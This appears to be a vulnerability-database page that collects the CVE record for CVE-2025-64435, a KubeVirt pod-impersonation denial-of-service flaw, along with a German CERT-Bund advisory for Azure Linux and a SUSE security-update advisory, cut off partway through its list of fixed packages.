Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64435 (GCVE-0-2025-64435)
Vulnerability from cvelistv5 – Published: 2025-11-07 22:57 – Updated: 2025-11-10 19:01 – CWE-703 - Improper Check or Handling of Exceptional Conditions
| URL | Tags |
|---|---|
| https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9 | x_refsource_CONFIRM |
| https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64435",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T19:00:48.220627Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T19:01:13.977Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.7.0-beta.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T22:57:02.600Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
}
],
"source": {
"advisory": "GHSA-9m94-w2vq-hcf9",
"discovery": "UNKNOWN"
},
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64435",
"datePublished": "2025-11-07T22:57:02.600Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T19:01:13.977Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64435\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:45.850\",\"lastModified\":\"2025-11-25T17:15:44.140\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de la versi\u00f3n 1.7.0-beta.0, un fallo l\u00f3gico en el virt-controller permite a un atacante interrumpir el control sobre una VMI en ejecuci\u00f3n al crear un pod con las mismas etiquetas que el pod virt-launcher leg\u00edtimo asociado a la VMI. Esto puede inducir a error al virt-controller para que asocie el pod falso con la VMI, lo que resulta en actualizaciones de estado incorrectas y potencialmente causando un DoS (Denial-of-Service). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 1.7.0-beta.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-703\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndIncluding\":\"1.6.3\",\"matchCriteriaId\":\"5115F453-4A3D-438D-A8F3-94C5E8451F45\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"6C13B76B-290B-4D75-AF75-54FEC43B75C4\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64435\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T19:00:48.220627Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T19:00:55.699Z\"}}], \"cna\": {\"title\": \"KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation\", \"source\": {\"advisory\": \"GHSA-9m94-w2vq-hcf9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.7.0-beta.0\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-703\", \"description\": \"CWE-703: Improper Check or Handling of Exceptional Conditions\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T22:57:02.600Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64435\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T19:01:13.977Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T22:57:02.600Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
WID-SEC-W-2025-2563
Vulnerability from csaf_certbund - Published: 2025-11-11 23:00 - Updated: 2025-12-14 23:00 - Notes
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Microsoft Azure Linux ist eine von Microsoft entwickelte Linux-Distribution, die f\u00fcr die Ausf\u00fchrung von Workloads in der Azure-Cloud optimiert ist.\r\nWindows ist ein Betriebssystem von Microsoft.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Microsoft Azure Linux und Microsoft Windows ausnutzen um erh\u00f6hte Privilegien zu erlangen, beliebigen Code auszuf\u00fchren, die Authentifizierung zu umgehen, Spoofing-Angriffe durchzuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder andere, nicht n\u00e4her spezifizierte Angriffe durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-2563 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-2563.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-2563 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2563"
},
{
"category": "external",
"summary": "Microsoft Leitfaden f\u00fcr Sicherheitsupdates",
"url": "https://msrc.microsoft.com/update-guide/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:4288-1 vom 2025-11-28",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2I3DAC5P7RIJP4M7YPNYJVIE4ZG7RSHV/"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-2F6CA95A74 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-2f6ca95a74"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-7C468696D2 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-7c468696d2"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-D39F46567C vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-d39f46567c"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-2CA3289343 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-2ca3289343"
}
],
"source_lang": "en-US",
"title": "Microsoft Azure Linux: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-12-14T23:00:00.000+00:00",
"generator": {
"date": "2025-12-15T10:15:06.656+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2025-2563",
"initial_release_date": "2025-11-11T23:00:00.000+00:00",
"revision_history": [
{
"date": "2025-11-11T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-11-30T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2025-12-14T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Fedora aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Fedora Linux",
"product": {
"name": "Fedora Linux",
"product_id": "74185",
"product_identification_helper": {
"cpe": "cpe:/o:fedoraproject:fedora:-"
}
}
}
],
"category": "vendor",
"name": "Fedora"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "azl3 nghttp2 1.61.0-2 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 nghttp2 1.61.0-2 on 3.0",
"product_id": "T048506",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_nghttp2_1.61.0-2_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 libarchive 3.7.7-3 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 libarchive 3.7.7-3 on 3.0",
"product_id": "T048507",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_libarchive_3.7.7-3_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 kernel 6.6.104.2-4 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 kernel 6.6.104.2-4 on 3.0",
"product_id": "T048508",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_kernel_6.6.104.2-4_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 curl 8.11.1-4 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 curl 8.11.1-4 on 3.0",
"product_id": "T048509",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_curl_8.11.1-4_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 cmake 3.30.3-10 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 cmake 3.30.3-10 on 3.0",
"product_id": "T048510",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_cmake_3.30.3-10_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 mysql 8.0.44-2 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 mysql 8.0.44-2 on 3.0",
"product_id": "T048512",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_mysql_8.0.44-2_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 libxml2 2.11.5-7 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 libxml2 2.11.5-7 on 3.0",
"product_id": "T048513",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_libxml2_2.11.5-7_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 rust 1.75.0-21 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 rust 1.75.0-21 on 3.0",
"product_id": "T048514",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_rust_1.75.0-21_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 containerd2 2.0.0-14 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 containerd2 2.0.0-14 on 3.0",
"product_id": "T048515",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_containerd2_2.0.0-14_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 rust 1.86.0-9 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 rust 1.86.0-9 on 3.0",
"product_id": "T048516",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_rust_1.86.0-9_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 kubevirt 1.5.0-5 on 3.0",
"product_id": "T048517",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_kubevirt_1.5.0-5_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 runc 1.3.3-1 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 runc 1.3.3-1 on 3.0",
"product_id": "T048518",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_runc_1.3.3-1_on_3.0"
}
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Subsystem for Linux GUI",
"product": {
"name": "Microsoft Windows Subsystem for Linux GUI",
"product_id": "T048511",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:windows:subsystem_for_linux_gui"
}
}
}
],
"category": "product_name",
"name": "Windows"
}
],
"category": "vendor",
"name": "Microsoft"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-25621",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2024-25621"
},
{
"cve": "CVE-2025-10966",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-10966"
},
{
"cve": "CVE-2025-12863",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-12863"
},
{
"cve": "CVE-2025-12875",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-12875"
},
{
"cve": "CVE-2025-31133",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-31133"
},
{
"cve": "CVE-2025-40107",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-40107"
},
{
"cve": "CVE-2025-40109",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-40109"
},
{
"cve": "CVE-2025-52565",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-52565"
},
{
"cve": "CVE-2025-52881",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-52881"
},
{
"cve": "CVE-2025-60753",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-60753"
},
{
"cve": "CVE-2025-62220",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-62220"
},
{
"cve": "CVE-2025-64329",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64329"
},
{
"cve": "CVE-2025-64432",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64436",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64436"
},
{
"cve": "CVE-2025-64437",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2026:0479-1
Vulnerability from csaf_suse - Published: 2026-02-12 15:34 - Updated: 2026-02-12 15:34 - Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container fixes the following issues:\n\nUpdate to version 1.7.0. (bsc#1257128)\n\n Release notes https://github.com/kubevirt/kubevirt/releases/tag/v1.7.0\n\n- CVE-2025-64435: Fixes logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS (bsc#1253189 )\n- CVE-2024-45310: Fixes kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into creating empty files/directories on host bsc#1257422 \n\n- Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-479,SUSE-SLE-Module-Containers-15-SP7-2026-479",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_0479-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:0479-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260479-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:0479-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024146.html"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container",
"tracking": {
"current_release_date": "2026-02-12T15:34:08Z",
"generator": {
"date": "2026-02-12T15:34:08Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:0479-1",
"initial_release_date": "2026-02-12T15:34:08Z",
"revision_history": [
{
"date": "2026-02-12T15:34:08Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64",
"product": {
